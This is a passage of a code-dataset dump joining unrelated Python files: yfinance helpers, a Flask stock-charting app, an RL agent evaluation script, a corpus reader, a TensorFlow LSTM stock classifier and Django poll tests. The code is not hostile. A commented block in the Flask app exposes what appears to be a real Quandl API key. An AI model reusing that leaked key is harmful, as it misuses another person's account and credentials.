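blob = re.sub(r'\{[\'|\"]raw[\'|\"]:(.*?),(.*?)\}', r'\1', blob)
assert json.loads(blob) == {"marketCap": 1234, "beta": None}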
df[\"Open\"] / ratio\n df[\"Adj High\"] = df[\"High\"] / ratio\n df[\"Adj Low\"] = df[\"Low\"] / ratio\n\n df.drop(\n [\"Open\", \"High\", \"Low\", \"Close\"],\n axis=1, inplace=True)\n\n df.rename(columns={\n \"Adj Open\": \"Open\", \"Adj High\": \"High\",\n \"Adj Low\": \"Low\", \"Adj Close\": \"Close\"\n }, inplace=True)\n\n df = df[[\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]]\n return df[[\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]]\n\n\ndef back_adjust(data):\n \"\"\" back-adjusted data to mimic true historical prices \"\"\"\n\n df = data.copy()\n ratio = df[\"Adj Close\"] / df[\"Close\"]\n df[\"Adj Open\"] = df[\"Open\"] * ratio\n df[\"Adj High\"] = df[\"High\"] * ratio\n df[\"Adj Low\"] = df[\"Low\"] * ratio\n\n df.drop(\n [\"Open\", \"High\", \"Low\", \"Adj Close\"],\n axis=1, inplace=True)\n\n df.rename(columns={\n \"Adj Open\": \"Open\", \"Adj High\": \"High\",\n \"Adj Low\": \"Low\"\n }, inplace=True)\n\n return df[[\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]]\n\n\ndef parse_actions(data, tz=None):\n dividends = _pd.DataFrame(columns=[\"Dividends\"])\n splits = _pd.DataFrame(columns=[\"Stock Splits\"])\n\n if \"events\" in data:\n if \"dividends\" in data[\"events\"]:\n dividends = _pd.DataFrame(\n data=list(data[\"events\"][\"dividends\"].values()))\n dividends.set_index(\"date\", inplace=True)\n dividends.index = _pd.to_datetime(dividends.index, unit=\"s\")\n dividends.sort_index(inplace=True)\n if tz is not None:\n dividends.index = dividends.index.tz_localize(tz)\n\n dividends.columns = [\"Dividends\"]\n\n if \"splits\" in data[\"events\"]:\n splits = _pd.DataFrame(\n data=list(data[\"events\"][\"splits\"].values()))\n splits.set_index(\"date\", inplace=True)\n splits.index = _pd.to_datetime(splits.index, unit=\"s\")\n splits.sort_index(inplace=True)\n if tz is not None:\n splits.index = splits.index.tz_localize(tz)\n splits[\"Stock Splits\"] = splits[\"numerator\"] / \\\n splits[\"denominator\"]\n splits = splits[\"Stock Splits\"]\n\n return dividends, splits\n\n\nclass ProgressBar:\n def __init__(self, iterations, text='completed'):\n self.text = text\n self.iterations = iterations\n self.prog_bar = '[]'\n self.fill_char = '*'\n self.width = 50\n self.__update_amount(0)\n self.elapsed = 1\n\n def completed(self):\n if self.elapsed > self.iterations:\n self.elapsed = self.iterations\n self.update_iteration(1)\n print('\\r' + str(self), end='')\n _sys.stdout.flush()\n print()\n\n def animate(self, iteration=None):\n if iteration is None:\n self.elapsed += 1\n iteration = self.elapsed\n else:\n self.elapsed += iteration\n\n print('\\r' + str(self), end='')\n _sys.stdout.flush()\n self.update_iteration()\n\n def update_iteration(self, val=None):\n val = val if val is not None else self.elapsed / float(self.iterations)\n self.__update_amount(val * 100.0)\n self.prog_bar += ' %s of %s %s' % (\n self.elapsed, self.iterations, self.text)\n\n def __update_amount(self, new_amount):\n percent_done = int(round((new_amount / 100.0) * 100.0))\n all_full = self.width - 2\n num_hashes = int(round((percent_done / 100.0) * all_full))\n self.prog_bar = '[' + self.fill_char * \\\n num_hashes + ' ' * (all_full - num_hashes) + ']'\n pct_place = (len(self.prog_bar) // 2) - len(str(percent_done))\n pct_string = '%d%%' % percent_done\n self.prog_bar = self.prog_bar[0:pct_place] + \\\n (pct_string + self.prog_bar[pct_place + len(pct_string):])\n\n def __str__(self):\n return str(self.prog_bar)\n\n\n\nclass dotdict(dict):\n def __getattr__(self, key):\n try:\n return 
self[key]\n except KeyError as e:\n print(f'KeyError ({key}):', e, end='\\t')\n if '__parent' in self: print('from', self['__parent'])\n else: print('')\n raise e\n\n def tprint(self):\n dotdict.treePrint(self)\n\n def wrap(self):\n for k,v in self.items():\n if isinstance(v, dict):\n self[k] = dotdict(v).wrap()\n return self\n\n def unwrap(self):\n for k,v in self.items():\n if isinstance(v, dotdict):\n self[k] = dict(v.unwrap())\n return dict(self)\n\n @classmethod\n def treePrint(cls, D, tablevel=0):\n if isinstance(D, dict):\n for k, v in D.items():\n print('\\t'*tablevel + f'{k}: {v if not isinstance(v, dict) else \"-\"}')\n dotdict.treePrint(v, tablevel+1)\n\n \n\n\ndef retry( exceptions=(Exception,),\n total=max_retries, \n backoff_factor=backoff_factor, \n exception_predicate=lambda e : True,\n logging_hook=print):\n '''\n decorator for retrying functions after they throw exceptions\n \n Input:\n exceptions: tuple of Exceptions which should be retried after\n total: maximum numer of times to retry\n backoff_factor: {delay} = {backoff_factor} * 2**{num attempts}\n exception_predicate: handle an Exception e iff exception_predicate(e)\n logging_hook: function called on handled exceptions\n '''\n\n def decorator( f, \n exceptions=exceptions,\n total=total, \n backoff_factor=backoff_factor, \n exception_predicate=exception_predicate,\n logging_hook=logging_hook):\n\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n for i in range(total):\n try:\n return f(*args, **kwargs)\n except exceptions as e:\n if exception_predicate(e):\n logging_hook(i, e)\n delay = backoff_factor * 2**i\n time.sleep(delay)\n # print(f'failed retry number: {i} || {e}')\n error = e\n continue\n else:\n raise e \n # print('giving up')\n raise type(error)('Too many retries...:' + str(error)) from error\n\n return wrapper\n\n return decorator\n\nretryHTTP = functools.partial(\n retry, \n exceptions=(HTTPError,IncompleteRead),\n exception_predicate=lambda e: e.code in retry_code_list,\n logging_hook=logging_hook\n )\n\n_requests.get = retry(exceptions=(ChunkedEncodingError,IncompleteRead))(_requests.get)\n\n\n\n\n@retry(exceptions=(ValueError,))\ndef parse_quotes(data, tz=None):\n timestamps = data[\"timestamp\"]\n ohlc = data[\"indicators\"][\"quote\"][0]\n volumes = ohlc[\"volume\"]\n opens = ohlc[\"open\"]\n closes = ohlc[\"close\"]\n lows = ohlc[\"low\"]\n highs = ohlc[\"high\"]\n\n adjclose = closes\n if \"adjclose\" in data[\"indicators\"]:\n adjclose = data[\"indicators\"][\"adjclose\"][0][\"adjclose\"]\n\n quotes = _pd.DataFrame({\"Open\": opens,\n \"High\": highs,\n \"Low\": lows,\n \"Close\": closes,\n \"Adj Close\": adjclose,\n \"Volume\": volumes})\n\n quotes.index = _pd.to_datetime(timestamps, unit=\"s\")\n quotes.sort_index(inplace=True)\n\n if tz is not None:\n quotes.index = quotes.index.tz_localize(tz)\n\n return quotes\n","sub_path":"yfinance/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396637763","text":"'''\nimport pandas as pd\nimport quandl\nquandl.ApiConfig.api_key = \"xwsP7NGjMxhm6CYLT7C3\"\n\n\nimport argparse\nimport json\nimport pprint\nimport os\nimport sys\nimport urllib\n\n'''\nimport pandas as pd\nimport requests\nimport io\n\n# This client code can run on Python 2.x or 3.x. 
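# The retry decorator above sleeps backoff_factor * 2**attempt between tries
# (0.075, 0.15, 0.3, ... with the module defaults). Trimmed to its essentials
# and exercised against a function that fails twice before succeeding:
import functools, time

def retry(total=3, backoff_factor=0.0, exceptions=(ValueError,)):
    def deco(f):
        @functools.wraps(f)
        def wrapper(*args, **kwargs):
            for i in range(total):
                try:
                    return f(*args, **kwargs)
                except exceptions as err:
                    time.sleep(backoff_factor * 2 ** i)   # exponential backoff
                    last = err
            raise last
        return wrapper
    return deco

calls = []
@retry()
def flaky():
    calls.append(1)
    if len(calls) < 3:
        raise ValueError("transient")
    return "ok"

assert flaky() == "ok" and len(calls) == 3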
# This client code can run on Python 2.x or 3.x. Your imports can be\n# simpler if you only need one of those.\ntry:\n    # For Python 3.0 and later\n    from urllib.error import HTTPError\n    from urllib.parse import quote\n    from urllib.parse import urlencode\nexcept ImportError:\n    # Fall back to Python 2's urllib2 and urllib\n    from urllib2 import HTTPError\n    from urllib import quote\n    from urllib import urlencode\n\ndef get_metadata():\n    metafile_url = 'WIKI-datasets-codes.csv'\n    meta = pd.read_csv(metafile_url, header=None, names=['code', 'descrip'])\n    companylookup = [ (descrip[0:descrip.find(' Prices')], code.split('/')[-1]) \n                      for code, descrip in zip(meta.code, meta.descrip) ]\n\n    # compile final database accounting for exceptions\n    db = {}\n    for company, ticker in companylookup:\n        if company[-1] != ')':\n            company = company + (' (%s)' % ticker)\n\n        db[company] = ticker\n    return db\n\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.embed import components\nfrom bokeh.palettes import Spectral11\nfrom math import log10\nfrom datetime import date, timedelta\nfrom dateutil.relativedelta import relativedelta\n\n\n\ndef request_api(host, path, api_key, url_params=None):\n    \"\"\"Given your api_key, send a GET request to the API.\n\n    Args:\n        host (str): The domain host of the API.\n        path (str): The path of the API after the domain.\n        api_key (str): Your API Key.\n        url_params (dict): An optional set of query parameters in the request.\n\n    Returns:\n        dict: The JSON/CSV response from the request.\n\n    Raises:\n        HTTPError: An error occurs from the HTTP request.\n    \"\"\"\n    url_params = url_params or {}\n    url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n\n\n    print(u'Querying {0} ...'.format(url))\n    print('url is',url)\n    response = requests.request('GET', url, headers=None, params=url_params)\n    return pd.read_csv(io.StringIO(response.text))\n\n\n'''\nDATA Source: https://www.alphavantage.co\nFree API to get stock data\n'''\nAPI_HOST = \"https://www.alphavantage.co/query?\"\nSEARCH_PATH = \"\"\nuse_key='alpha_vantage_api.key'\nwith open(use_key) as keyfile:\n    key_0=keyfile.readlines()\nAPI_KEY= key_0[0][:-1]\n\n\n\ndef get_alpha_vantage_daily_adjusted(api_key, ticker):\n    url_params = {\n        'symbol': ticker,\n        'function': \"TIME_SERIES_DAILY_ADJUSTED\",\n        'outputsize': \"compact\",\n        'apikey': api_key,\n        'datatype': 'csv'\n    }\n    return request_api(API_HOST, SEARCH_PATH, api_key, url_params=url_params)\n\n\n\n\ndef build_graph(ticker,show_closing,show_adj_closing,show_opening,show_high,show_low):\n\n\n    month_data = get_alpha_vantage_daily_adjusted(API_KEY,ticker)\n    month_data.timestamp = pd.to_datetime(month_data.timestamp) # datetime formatted\n    month_data = month_data.iloc[:31] # get last 31 days only\n\n    # debug\n    #print(\"Data columns\", month_data.columns)\n    #print(\"Data x is\",month_data.timestamp)\n    #print(\"Data y is\",month_data.close)\n\n    x = month_data.timestamp\n    y = month_data.close # closing prices\n    \n\n    plot = figure(title='Data from Alpha Vantage API',\n                  x_axis_label='date',\n                  x_axis_type='datetime',\n                  y_axis_label='price')\n    y_values = []\n    legend_list = []\n    color_list = []\n    if show_high:\n        y_values.append(month_data.high)\n        legend_list.append('Daily high')\n        color_list.append('red')\n    if show_low:\n        y_values.append(month_data.low)\n        legend_list.append('Daily low')\n        color_list.append('green')\n    if show_closing:\n        y_values.append(month_data.close)\n        legend_list.append('Closing')\n        color_list.append('black')\n
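# [editor's note] Hedged usage sketch for the Alpha Vantage helpers above; the
# ticker is illustrative and a valid key must exist in 'alpha_vantage_api.key':
#
#   df = get_alpha_vantage_daily_adjusted(API_KEY, 'MSFT')
#   df.columns  # timestamp, open, high, low, close, adjusted_close, volume, ...
#
# The 'datatype': 'csv' parameter is what lets request_api() hand the response
# body straight to pd.read_csv.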
    if show_adj_closing:\n        y_values.append(month_data.adjusted_close)\n        legend_list.append('Adj_closing')\n        color_list.append('pink')\n    if show_opening:\n        y_values.append(month_data.open)\n        legend_list.append('Opening')\n        color_list.append('blue')\n\n    x_values = [month_data.timestamp]*len(y_values)\n\n    # plot.multi_line() does not manage legends very well, so draw one line per series\n    for (colr, leg, x, y) in zip(color_list, legend_list, x_values, y_values):\n        my_plot = plot.line(x, y, color=colr, legend=leg)\n    plot.legend.location='top_left'\n    plot.legend.click_policy='hide'\n\n    script, div = components(plot)\n\n    return script, div\n\n\nfrom flask import Flask, render_template, request, jsonify, redirect, url_for\nfrom flask_bootstrap import Bootstrap\napp = Flask(__name__)\n#bs_app = Bootstrap(app)\n\ndb = get_metadata()\ndefaultheader = \"Company Stock to graph\"\n\n@app.route('/')\ndef render_root():\n    return render_template('input.html', header = defaultheader)\n\n@app.route('/autocomplete', methods=['GET'])\ndef autocomplete():\n    search = request.args.get('q', '').lower()  # lowercase both sides for a case-insensitive match\n    results = [k for k in db.keys() if k.lower().find(search) != -1]\n    return jsonify(matching_results=results)\n\n\n@app.route('/graph', methods=['GET', 'POST'])\ndef graphCompany(company=None):\n    if request.method == 'POST':\n\n        company = (request.form['company'])\n        show_closing = \"show_closing\" in request.form\n        show_adj_closing = \"show_adj_closing\" in request.form\n        show_opening = \"show_opening\" in request.form\n        show_high = \"show_high\" in request.form\n        show_low = \"show_low\" in request.form\n        #print(\"show_closing\",show_closing)\n\n        if company not in db.keys():\n            header = \"%s not in database. Re-enter the company to graph\" % company
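# [editor's note] Sketch of how the (script, div) pair from build_graph() is
# meant to be consumed inside graph.html (template name from the code below;
# the markup itself is illustrative):
#
#   <body>
#     {{ div|safe }}
#     {{ script|safe }}
#   </body>
#
# The |safe filter stops Jinja2 from escaping the bokeh <script>/<div> markup.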
\n            return render_template('input.html', header=header)\n\n        ticker = db[company]\n\n        script, div = build_graph(ticker,show_closing,show_adj_closing,show_opening,show_high,show_low)\n        return render_template('graph.html', script=script, div=div, \n                               ticker=ticker, company=company)\n\n    else:\n        return render_template('input.html', header = defaultheader)\n\nif __name__ == '__main__':\n    app.static_folder = 'static' # to render static CSS files\n    app.run(debug=False)\n    #app.run(port=33507)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149939861","text":"import argparse\nimport os\n# workaround to unpickle old model files\nimport sys\n\nimport numpy as np\nimport h5py\nimport torch\nimport gym\n\nfrom a2c_ppo_acktr import algo, utils\nfrom a2c_ppo_acktr.arguments import get_args\nfrom a2c_ppo_acktr.envs import VecPyTorch, make_vec_envs\nfrom a2c_ppo_acktr.utils import get_render_func, get_vec_normalize\n\n\"\"\"\n\npython enjoy.py --env-name FetchPickAndPlace-v1 --algo ppo --episode 10 --save-date 191023_CVAE \\\n--use-latent --latent-dim 1 --task-transition --render --vis-interval 1\n\n\npython enjoy.py --env-name InvertedPendulum-v2 --algo acktr --episode 10 --save-date 190909_hGAIL\n\npython enjoy.py --env-name MountainGolfCar-v1 --algo ppo --episode 10 --save-date 190922_hGAIL \\\n--use-latent --latent-dim 1 --render --vis-interval 1\n\npython enjoy.py --env-name MountainToyCar-v1 --algo ppo --episode 10 --save-date 190928_wasserstein_GAIL_with_latent_p15 \\\n--use-latent --latent-dim 1 --render --vis-interval 1\n\npython enjoy.py --env-name FetchPickAndPlace-v1 --algo ppo --episode 10 \\\n--save-date 191023_wasserstein_GAIL_with_latent_1_p13 --use-latent --latent-dim 1 --task-transition --render --vis-interval 1\n\npython enjoy.py --env-name FetchPickAndPlace-v1 --algo a2c --episode 10 \\\n--save-date 191023_CAVE --use-latent --latent-dim 1 --task-transition --render --vis-interval 1\n\n# MountainToyCar Success Command\npython generate_latent_graph.py --env-name MountainOldCar-v1 --algo ppo --episode 10 \\\n--save-date 191006_standard_GAIL_with_latent_1_p10_v2 --use-latent --latent-dim 1 --task-transition\n\n\"\"\"\n\nsys.path.append('a2c_ppo_acktr')\n\ndef reset_model_machines(model, device):\n    model.to(device)\n    model.device = device\n\ndef expand_save_folder_dirs(rootdir, args):\n    latent_seed_pretrain = str(args.latent_dim) + \"_\" + str(args.seed) + \"_\" + args.pretrain_algo\n\n    _filename = os.path.expanduser(rootdir)\n    filename = os.path.join(_filename, args.algo, args.gail_algo, args.save_date, latent_seed_pretrain)\n\n    try:\n        os.makedirs(filename)\n    except OSError:\n        pass\n\n    utils.cleanup_log_dir(filename)\n\n    return filename\n\ndef expand_load_folder_dirs(rootdir, args):\n    latent_seed_pretrain = str(args.latent_dim) + \"_\" + str(args.seed) + \"_\" + args.pretrain_algo\n\n    _filename = os.path.expanduser(rootdir)\n    filename = os.path.join(_filename, args.algo, args.gail_algo, args.load_date, latent_seed_pretrain)\n\n    return filename\n\nargs = get_args()\n# args.det = not args.non_det\n# print(\"deterministic: \", args.det)\n\n# Define directories\nlog_dir = expand_save_folder_dirs(args.log_dir, args)\npre_log_dir = expand_save_folder_dirs(args.pre_log_dir, args)\neval_log_dir = log_dir + \"_eval\"\npre_eval_log_dir = pre_log_dir + \"_eval\"\nutils.cleanup_log_dir(eval_log_dir)\n\nresult_dir = 
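# [editor's note] Worked example of the directory scheme that
# expand_save_folder_dirs() above produces, with invented argument values:
#
#   log_dir='./logs', algo='ppo', gail_algo='standard', save_date='191023',
#   latent_dim=1, seed=0, pretrain_algo='bc'
#     -> ./logs/ppo/standard/191023/1_0_bc
#
# expand_load_folder_dirs() builds the same path but keyed on args.load_date.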
expand_save_folder_dirs(args.result_dir, args)\npre_result_dir = expand_save_folder_dirs(args.pre_result_dir, args)\nload_dir = expand_load_folder_dirs(args.load_dir, args)\npre_load_dir = expand_load_folder_dirs(args.pre_load_dir, args)\n\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\nif args.test_model == 'pretrained':\n log_dir = pre_log_dir\n eval_log_dir = pre_eval_log_dir\n result_dir = pre_result_dir\n load_dir = pre_load_dir\n\nprint(\"=================================================================\")\nprint(\"0. env_name: \", args.env_name)\nprint(\"1. seed for test: \", args.seed)\nprint(\"2. log directory: \", log_dir)\n\n# We need to use the same statistics for normalization as used in training\nif torch.cuda.is_available():\n if args.use_latent:\n agent, ob_rms, post, discr, trans = torch.load(os.path.join(load_dir, args.env_name + \".pt\"))\n print(\"4. load directory: \", os.path.join(load_dir, args.env_name + \".pt\"))\n\n reset_model_machines(post, device)\n reset_model_machines(discr, device)\n reset_model_machines(trans, device)\n\n else:\n agent, ob_rms = torch.load(os.path.join(load_dir, args.env_name + \".pt\"))\n print(\"4. load directory: \", os.path.join(load_dir, args.env_name + \".pt\"))\n\n reset_model_machines(agent.actor_critic, device)\n\nelse:\n if args.use_latent:\n agent, ob_rms, post, discr, trans = torch.load(os.path.join(load_dir, args.env_name + \".pt\"), map_location='cpu')\n print(\"4. load directory: \", os.path.join(load_dir, args.env_name + \".pt\"))\n\n reset_model_machines(post, device)\n reset_model_machines(discr, device)\n reset_model_machines(trans, device)\n\n else:\n agent, ob_rms = torch.load(os.path.join(load_dir, args.env_name + \".pt\"), map_location='cpu')\n print(\"4. 
load directory: \", os.path.join(load_dir, args.env_name + \".pt\"))\n\n reset_model_machines(agent.actor_critic, device)\n\nenv = make_vec_envs(args.env_name, args.seed + 1000, 1, None, None,\n device='cpu', allow_early_resets=False)\n\n# Get a render function and vectorize environments\nrender_func = get_render_func(env)\nvec_norm = get_vec_normalize(env)\n\n# if args.render and render_func is not None:\n # render_func('human') # it is not applicable for custom_tasks\n\nif vec_norm is not None:\n vec_norm.eval()\n vec_norm.ob_rms = ob_rms\n\nif args.env_name.find('Bullet') > -1:\n import pybullet as p\n\n torsoId = -1\n for i in range(p.getNumBodies()):\n if (p.getBodyInfo(i)[0].decode() == \"torso\"):\n torsoId = i\n\n\nprint(\"=================================================================\")\nif args.save_result is False:\n print(\"DO NOT SAVE RESULTS\")\n\ndones = []\nepisode_returns = []\n# latent variable evaluation for each episode\nfor e in range(args.episode):\n states, actions, rewards, task_mus, task_sigmas, tasks = [], [], [], [], [], []\n\n obs = env.reset().to(device)\n recurrent_hidden_states = torch.zeros(1, agent.actor_critic.recurrent_hidden_state_size).to(device)\n\n if args.use_latent and args.task_transition:\n # prev_task = torch.normal(\n # mean=torch.zeros(args.num_processes, args.latent_dim),\n # std=torch.ones(args.num_processes, args.latent_dim)).to(device)\n prev_task = torch.randn((args.num_processes, args.latent_dim)).to(device)\n prev_task = torch.zeros_like(prev_task).to(device)\n recurrent_hidden_task_states = torch.zeros(1, args.latent_dim * 4).to(device)\n\n episode_rewards = 0.0\n masks = torch.zeros(1, 1).to(device)\n done = False\n\n while not done:\n with torch.no_grad():\n if args.use_latent and args.task_transition:\n task, task_mu, task_sigma, recurrent_hidden_task_states = trans.act(obs, prev_task,\n recurrent_hidden_task_states,\n masks,\n mean_mode=True,\n use_random_latent=args.use_random_latent,\n use_constant_latent=args.use_constant_latent,\n constant_latent=args.constant_latent)\n\n value, action, action_log_prob, recurrent_hidden_states = agent.actor_critic.act(\n # obs, task, recurrent_hidden_states, masks, deterministic=args.det)\n obs, task, recurrent_hidden_states, masks, deterministic=True)\n else:\n value, action, action_log_prob, recurrent_hidden_states = agent.actor_critic.act(\n # obs, recurrent_hidden_states, masks, deterministic=args.det)\n obs, recurrent_hidden_states, masks, deterministic=True)\n\n next_obs, reward, done, infos = env.step(action.cpu())\n\n episode_rewards += reward\n masks.fill_(0.0 if done else 1.0)\n\n if args.env_name.find('Bullet') > -1:\n if torsoId > -1:\n distance = 5\n yaw = 0\n humanPos, humanOrn = p.getBasePositionAndOrientation(torsoId)\n p.resetDebugVisualizerCamera(distance, yaw, -20, humanPos)\n\n if render_func is not None:\n if args.render and e % args.vis_interval == 0:\n env.render()\n\n states.append(obs.cpu().numpy())\n actions.append(action.cpu().numpy())\n rewards.append(reward.cpu().numpy())\n\n if args.use_latent and args.task_transition:\n task_mus.append(task_mu.cpu().numpy())\n task_sigmas.append(task_sigma.cpu().numpy())\n tasks.append(task.cpu().numpy())\n\n prev_task = task\n\n obs = next_obs.to(device)\n\n if args.env_name == \"FetchPickAndPlace-v1\":\n print(\"env_name: FetchPickAndPlace-v1\")\n if abs(reward) < 0.1:\n done = True\n else:\n done = False\n elif args.env_name == \"MountainToyCar-v1\":\n print(\"env_name: MountainToyCar-v1\")\n if len(states) < 200:\n done = 
True\n else:\n done = False\n elif args.env_name == \"MountainToyCarContinuous-v1\":\n print(\"env_name: MountainToyCarContinuous-v1\")\n if abs(reward) > 0.0:\n done = True\n else:\n done = False\n\n dones.append(done)\n episode_returns.append(episode_rewards)\n print(\"episode: \", e, \" length: \", len(states), \" returns: \", episode_rewards, \" result: \", abs(reward), \" done: \", done)\n\n if args.save_result:\n if args.use_latent and args.task_transition:\n task_mus, task_sigmas, tasks = np.array(task_mus), np.array(task_sigmas), np.array(tasks)\n task_mus, task_sigmas, tasks = np.squeeze(task_mus, axis=1), np.squeeze(task_sigmas, axis=1), np.squeeze(tasks, axis=1)\n\n assert len(tasks) == len(task_mus), 'len(states) != len(actions)'\n assert len(tasks) == len(task_sigmas), 'len(states) != len(rewards)'\n assert len(tasks) == len(rewards), 'len(tasks) != len(rewards)'\n\n states = np.squeeze(np.array(states), axis=1)\n actions = np.squeeze(np.array(actions), axis=1)\n rewards = np.squeeze(np.array(rewards), axis=1)\n\n if args.use_latent and args.task_transition:\n task_data = np.hstack([states, actions, rewards, task_mus, task_sigmas, tasks])\n else:\n task_data = np.hstack([states, actions, rewards])\n\n np.savetxt(fname=os.path.join(result_dir, args.env_name.split('-')[0].lower() + \"_\" + str(e) + \".csv\"),\n X=task_data, delimiter=',')\n print(\"save file: \", os.path.join(result_dir, args.env_name.split('-')[0].lower() + \"_\" + str(e) + \".csv\"))\n\n\ndones = np.array(dones)\nsuccess_rate = np.sum(dones) / dones.shape[0]\nprint(\"=========================================================\")\nprint(\"env_name: \", args.env_name)\nprint(\"load_model: \", load_dir)\nprint(\"mean and variance of episode_returns: \", np.mean(episode_returns), np.std(episode_returns))\nprint(\"success_rate: \", success_rate)\nprint(\"=========================================================\")\n","sub_path":"enjoy.py","file_name":"enjoy.py","file_ext":"py","file_size_in_byte":11118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"258707903","text":"from .drivers import get_driver\nimport json, os\n\nclass CorpusReader:\n def __init__(self, addr, driver, parse_dir='./.parse/'):\n self.data = []\n self.addr = addr\n self.parse_dir = parse_dir\n self.driver = get_driver(driver)\n\n if not os.path.exists(self.parse_dir):\n os.mkdir(self.parse_dir)\n\n def get_dir(self):\n addr = self.addr.replace('/','-')\n return f'{self.parse_dir}{self.driver.__name__.lower()}-{addr}'\n \n def get_data(self):\n self.read(self.addr)\n\n tosave = ['id', 'title', 'author']\n self.simple = list(map(lambda item: {x:item[x] for x in tosave}, self.data))\n with open(self.get_dir(), 'w') as fd:\n json.dump(self.simple, fd)\n return self.data\n\n def get_info(self, rank):\n try:\n with open(self.get_dir(), 'r') as fd:\n self.simple = json.load(fd)\n except FileNotFoundError:\n self.get_data()\n details = []\n for (_, id) in rank:\n info = self.simple[id - 1]\n details.append((info['title'], info['author']))\n return details\n\n def read(self, addr):\n self.data.extend(self.driver.read(addr))\n","sub_path":"src/corpustools/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"545092294","text":"# from tensorflow.examples.tutorials.mnist import input_data;\n# mnist = input_data.read_data_sets(\"MNIST_data/\",one_hot=True);\nimport copy;\nimport 
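# [editor's note] Worked example of the 13-way one-hot binning used by data_pre
# below: one-period returns are clipped to [-3, +3] percent and bucketed in
# 0.5% steps, so pos = int((clipped + 3) / 0.5).
#
#   r = +1.2%  -> pos = int(4.2 / 0.5) = 8  -> label[8] = 1 (of 13 slots)
#   r = -3.7%  -> clipped to -3 -> pos = 0;  r = +3% -> pos = 12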
tensorflow as tf;\nimport sys;\nsys.path.append('../..');\nfrom feature_extraction.index_feature_extraction import *;\nimport numpy as np;\n\ndef feature_collect(code,ktype, start, end):\n\tresult=[];\n\tcdata=ts.get_k_data(code=code,ktype=ktype,start=start,end=end);\n\tresult=list(cdata['close'].values);\n\treturn result;\n\ndef data_pre(code,ktype, start, end, datalen=50):\n\tdata=[];\n\tlabel=[];\n\ttemplabel=[];\n\txdataorigin=feature_collect(code,ktype,start, end);\n\tlabelorigin=[0];\n\tfor i in range(1,len(xdataorigin)):\n\t\tlabelorigin.append(100.0*(xdataorigin[i]-xdataorigin[i-1])/xdataorigin[i-1]);\n\txglen=len(xdataorigin);\n\tfor i in range(datalen,xglen):\n\t\ttemp=[];\n\t\ttemp=copy.deepcopy(xdataorigin[i-datalen:i]);\n\t\tdata.append(temp);\n\t\ttemplabel.append(labelorigin[i-datalen]);\n\n\tfor i in range(0,len(templabel)):\n\t\ttemp=[0]*13;\n\t\tif templabel[i]>3:\n\t\t\ttemplabel[i]=3;\n\t\telif templabel[i]<-3:\n\t\t\ttemplabel[i]=-3;\n\t\tpos=int((templabel[i]+3)/0.5);\n\t\ttemp[pos]=1;\n\t\tlabel.append(temp);\n\treturn data,label;\n\n\nlearning_rate =0.001;\nbatch_size =200;\ndisplay_step =100;\n\nn_input =500;\nn_steps =1;\nn_hidden =20;\nn_classes =13;\n\ndata,labels=data_pre('hs300','d','2005-04-02','2017-05-30',n_input);\ndata=np.array(data);\nlabels=np.array(labels);\n\nprint(data.shape);\ndatalen=len(data);\ntraining_iters=int(datalen*0.8);\n\nx= tf.placeholder(\"float32\",[None, n_steps,n_input]);\ny= tf.placeholder(\"float32\",[None,n_classes]);\n\nweights={'hidden':tf.Variable(tf.random_normal([n_input,n_hidden])),\n\t\t'out':tf.Variable(tf.random_normal([n_hidden, n_classes]))\n}\n\nbiases={\n\t'hidden': tf.Variable(tf.random_normal([n_hidden])),\n\t'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\nlstm_cell = tf.contrib.rnn.BasicLSTMCell(n_hidden, forget_bias=0.0, state_is_tuple=True);\n_state =lstm_cell.zero_state(batch_size,tf.float32);\n\na1 = tf.transpose(x, [1, 0, 2])\na2 = tf.reshape(a1, [-1, n_input]) \na3 = tf.matmul(a2, weights['hidden']) + biases['hidden'] \na4 = tf.split(a3, n_steps, 0)\n\noutputs,states =tf.contrib.rnn.static_rnn(lstm_cell, a4 ,initial_state=_state);\na5=tf.matmul(outputs[-1], weights['out'])+biases['out'];\n\ncost =tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=a5));\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost);\n\ncorrect_pred = tf.equal(tf.argmax(a5,1),tf.argmax(y,1));\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32));\ninit = tf.initialize_all_variables();\n\nsess=tf.InteractiveSession();\nsess.run(init);\nstep =0;\nwhile (step+1) *batch_size ']\n        )\n\n    def test_future_question(self):\n        \"\"\"\n        Questions with a pub_date in the future aren't displayed on the index page.\n        :return:\n        \"\"\"\n        create_question(question_text='Future question.', days=30)\n        response = self.client.get(reverse('polls:index'))\n        self.assertContains(response, 'No polls are available.')\n\n    def test_future_question_and_past_question(self):\n        \"\"\"\n        Even if both past and future questions exist, only past questions are displayed.\n        :return:\n        \"\"\"\n        create_question(question_text='Past question.', days=-30)\n        create_question(question_text='Future question', days=30)\n        response = self.client.get(reverse('polls:index'))\n        self.assertQuerysetEqual(\n            response.context['latest_question_list'],\n            ['<Question: Past question.>']\n        )\n\n    def test_two_past_question(self):\n        \"\"\"\n        The questions page may display multiple questions.\n        :return:\n        \"\"\"\n
